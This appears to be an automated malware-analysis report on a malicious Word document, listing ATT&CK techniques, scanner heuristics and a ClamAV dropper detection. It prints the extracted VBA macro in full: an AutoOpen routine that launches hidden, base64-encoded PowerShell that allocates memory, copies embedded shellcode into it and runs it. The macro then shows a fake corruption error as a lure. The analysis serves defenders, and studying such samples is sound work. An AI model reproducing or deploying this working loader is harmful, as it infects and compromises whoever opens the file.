MALICIOUS
312
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains VBA macros with an AutoOpen subroutine that executes a PowerShell command. The PowerShell command is heavily obfuscated but appears to download and execute a second-stage payload. The document body uses a common lure to convince users to enable macros.
Heuristics 10
-
ClamAV: Doc.Dropper.MagicHound-5859115-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.MagicHound-5859115-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
& "IAFMAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQwBIAFMAIAAkAGUAIgA7AH0A" Shell ("powershell.exe " & x) Dim title As String -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
& "IAFMAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQwBIAFMAIAAkAGUAIgA7AH0A" Shell ("powershell.exe " & x) Dim title As String -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() Dim x -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7739 bytes |
SHA-256: 91c68affec5595a95b7a5b4a448a5e7fa75e69982ad695d609ba536010bc42f5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 18 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim x
x = "-window hidden -e JABHADgAdAAgAD0AIAAnACQAQgBtAHQAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8" _
& "AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgA" _
& "gAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQ" _
& "AcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAQgBtAHQAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAA" _
& "wAHgAYgBhACwAMAB4AGYANwAsADAAeABjADYALAAwAHgANABlACwAMAB4ADAAMwAsADAAeABkADkALAAwAHgAZQBiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA1ADAALAAwAHgAMQAzACwAMAB4ADAAMwAsADAAeAA1ADAALAAwAHgAMQAzACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgAMABiACwAMAB4ADIANAAsADAAeABiAGIALAAwAHgAZgBmACwAMAB4ADE" _
& "AYgAsADAAeAAyAGIALAAwAHgANAA0ACwAMAB4ADAAMAAsADAAeABkAGIALAAwAHgANABjACwAMAB4AGMAYwAsADAAeABlADUALAAwAHgAZQBhACwAMAB4ADQAYwAsADAAeABhAGEALAAwAHgANgBlACwAMAB4ADUAYwAsADAAeAA3AGQALAAwAHgAYgA4ACwAMAB4ADIAMwAsADAAeAA1ADAALAAwAHgAZgA2ACwAMAB4AGUAYwAsADAAeABkADcALAAwAHgAZQAzACwAMAB4ADcAYQAsADAAeAAzADkALAAwAHgAZAA3ACwAMAB4ADQANAAsADAAeAAzADAALAAwAHgAMQBmACwAMAB4AGQANgAsADAAeAA1ADUALAA" _
& "wAHgANgA5ACwAMAB4ADYAMwAsADAAeAA3ADkALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeABiADAALAAwAHgANQA5ACwAMAB4AGUANAAsADAAeABiAGEALAAwAHgAYwA1ACwAMAB4ADkAOAAsADAAeAAyADEALAAwAHgAYQA2ACwAMAB4ADIANAAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGEAYwAsADAAeAA5AGIALAAwAHgAZgBkACwAMAB4ADgAZgAsADAAeABmADkALAAwAHgAMgA3ACwAMAB4ADcANQAsADAAeABjADMALAAwAHgAZQBjACwAMAB4ADIAZgAsADAAeAA2AGEALAAwAHgAOQAzACwAMAB4ADA" _
& "AZgAsADAAeAAwADEALAAwAHgAMwBkACwAMAB4AGEAOAAsADAAeAA0ADkALAAwAHgAOAAxACwAMAB4AGIAZgAsADAAeAA3AGQALAAwAHgAZQAyACwAMAB4ADgAOAAsADAAeABhADcALAAwAHgANgAyACwAMAB4AGMAZgAsADAAeAA0ADMALAAwAHgANQAzACwAMAB4ADUAMAAsADAAeABiAGIALAAwAHgANQA1ACwAMAB4AGIANQAsADAAeABhADkALAAwAHgANAA0ACwAMAB4AGYAOQAsADAAeABmADgALAAwAHgAMAA2ACwAMAB4AGIANwAsADAAeAAwADMALAAwAHgAMwBjACwAMAB4AGEAMAAsADAAeAAyADgALAA" _
& "wAHgANwA2ACwAMAB4ADMANAAsADAAeABkADMALAAwAHgAZAA1ACwAMAB4ADgAMQAsADAAeAA4ADMALAAwAHgAYQBlACwAMAB4ADAAMQAsADAAeAAwADcALAAwAHgAMQAwACwAMAB4ADAAOAAsADAAeABjADEALAAwAHgAYgBmACwAMAB4AGYAYwAsADAAeABhADkALAAwAHgAMAA2ACwAMAB4ADUAOQAsADAAeAA3ADYALAAwAHgAYQA1ACwAMAB4AGUAMwAsADAAeAAyAGQALAAwAHgAZAAwACwAMAB4AGEAOQAsADAAeABmADIALAAwAHgAZQAyACwAMAB4ADYAYQAsADAAeABkADUALAAwAHgANwBmACwAMAB4ADA" _
& "ANQAsADAAeABiAGQALAAwAHgANQBjACwAMAB4ADMAYgAsADAAeAAyADIALAAwAHgAMQA5ACwAMAB4ADAANQAsADAAeAA5AGYALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABlADMALAAwAHgANABlACwAMAB4ADcAMwAsADAAeAA1AGEALAAwAHgANABjACwAMAB4ADIAZQAsADAAeABkADEALAAwAHgAMQAwACwAMAB4ADYAMAAsADAAeAAzAGIALAAwAHgANgA4ACwAMAB4ADcAYgAsADAAeABlAGMALAAwAHgAOAA4ACwAMAB4ADQAMQAsADAAeAA4ADQALAAwAHgAZQBjACwAMAB4ADgANgAsADAAeABkADIALAA" _
& "wAHgAZgA3ACwAMAB4AGQAZQAsADAAeAAwADkALAAwAHgANAA5ACwAMAB4ADkAMAAsADAAeAA1ADIALAAwAHgAYwAxACwAMAB4ADUANwAsADAAeAA2ADcALAAwAHgAOQA1ACwAMAB4AGYAOAAsADAAeAAyADAALAAwAHgAZgA3ACwAMAB4ADYAOAAsADAAeAAwADMALAAwAHgANQAxACwAMAB4AGQAMQAsADAAeABhAGUALAAwAHgANQA3ACwAMAB4ADAAMQAsADAAeAA0ADkALAAwAHgAMAA3ACwAMAB4AGQAOAAsADAAeABjAGEALAAwAHgAOAA5ACwAMAB4AGEAOAAsADAAeAAwAGQALAAwAHgANgA2ACwAMAB4ADg" _
& "AZgAsADAAeAAzAGUALAAwAHgANgBlACwAMAB4AGQAZgAsADAAeAA4ADUALAAwAHgAYQBjACwAMAB4ADAANgAsADAAeAAyADIALAAwAHgAOQBhACwAMAB4AGMANQAsADAAeAA2ADUALAAwAHgAYQBiACwAMAB4ADcAYwAsADAAeABiADUALAAwAHgAZAA5ACwAMAB4AGYAYwAsADAAeABkADAALAAwAHgANwA1ACwAMAB4ADgAYQAsADAAeABiAGMALAAwAHgAOAAwACwAMAB4ADEAZAAsADAAeABjADAALAAwAHgAMwAyACwAMAB4AGYAZQAsADAAeAAzAGQALAAwAHgAZQBiACwAMAB4ADkAOAAsADAAeAA5ADcALAA" _
& "wAHgAZAA3ACwAMAB4ADAANAAsADAAeAA3ADUALAAwAHgAYwBmACwAMAB4ADQAZgAsADAAeABiAGMALAAwAHgAZABjACwAMAB4ADkAYgAsADAAeABlAGUALAAwAHgANAAxACwAMAB4AGMAYgAsADAAeABlADEALAAwAHgAMwAwACwAMAB4AGMAOQAsADAAeABmADgALAAwAHgAMQA2ACwAMAB4AGYAZQAsADAAeAAzAGEALAAwAHgANwA0ACwAMAB4ADAANQAsADAAeAA5ADYALAAwAHgAYwBhACwAMAB4AGMAMwAsADAAeAA3ADcALAAwAHgAMwAwACwAMAB4AGQANAAsADAAeABmADkALAAwAHgAMQAyACwAMAB4AGI" _
& "AYwAsADAAeAA0ADAALAAwAHgAMAA2ACwAMAB4AGIANQAsADAAeABlAGIALAAwAHgAZgBjACwAMAB4ADAANAAsADAAeABlADAALAAwAHgAZABiACwAMAB4AGEAMgAsADAAeABmADcALAAwAHgAYwA3ACwAMAB4ADUAMAAsADAAeAA2AGEALAAwAHgANgAyACwAMAB4AGEAOAAsADAAeAAwAGUALAAwAHgAOQAzACwAMAB4ADYAMgAsADAAeAAyADgALAAwAHgAYwBlACwAMAB4AGMANQAsADAAeABlADgALAAwAHgAMgA4ACwAMAB4AGEANgAsADAAeABiADEALAAwAHgANAA4ACwAMAB4ADcAYgAsADAAeABkADMALAA" _
& "wAHgAYgBkACwAMAB4ADQANAAsADAAeABlAGYALAAwAHgANAA4ACwAMAB4ADIAOAAsADAAeAA2ADcALAAwAHgANAA2ACwAMAB4ADMAZAAsADAAeABmAGIALAAwAHgAMABmACwAMAB4ADYANAAsADAAeAAxADgALAAwAHgAYwBiACwAMAB4ADgAZgAsADAAeAA5ADcALAAwAHgANABmACwAMAB4AGMAZAAsADAAeABlAGMALAAwAHgANAAxACwAMAB4AGEAOQAsADAAeABiAGIALAAwAHgAMQBjACwAMAB4ADUAMgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGc" _
& "AdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAQwB3AGgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEMAdwBoAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQA" _
& "sACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABDAHcAaAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGU" _
& "ALgBHAGUAdABCAHkAdABlAHMAKAAkAEcAOAB0ACkAKQA7ACQAQwBIAFMAIAA9ACAAIgAtAGUAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGsAdwB2AEYAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawB3AHYARgAgACQAQwB" _
& "IAFMAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQwBIAFMAIAAkAGUAIgA7AH0A"
Shell ("powershell.exe " & x)
Dim title As String
title = "Critical Microsoft Office Error"
Dim msg As String
Dim intResponse As Integer
msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.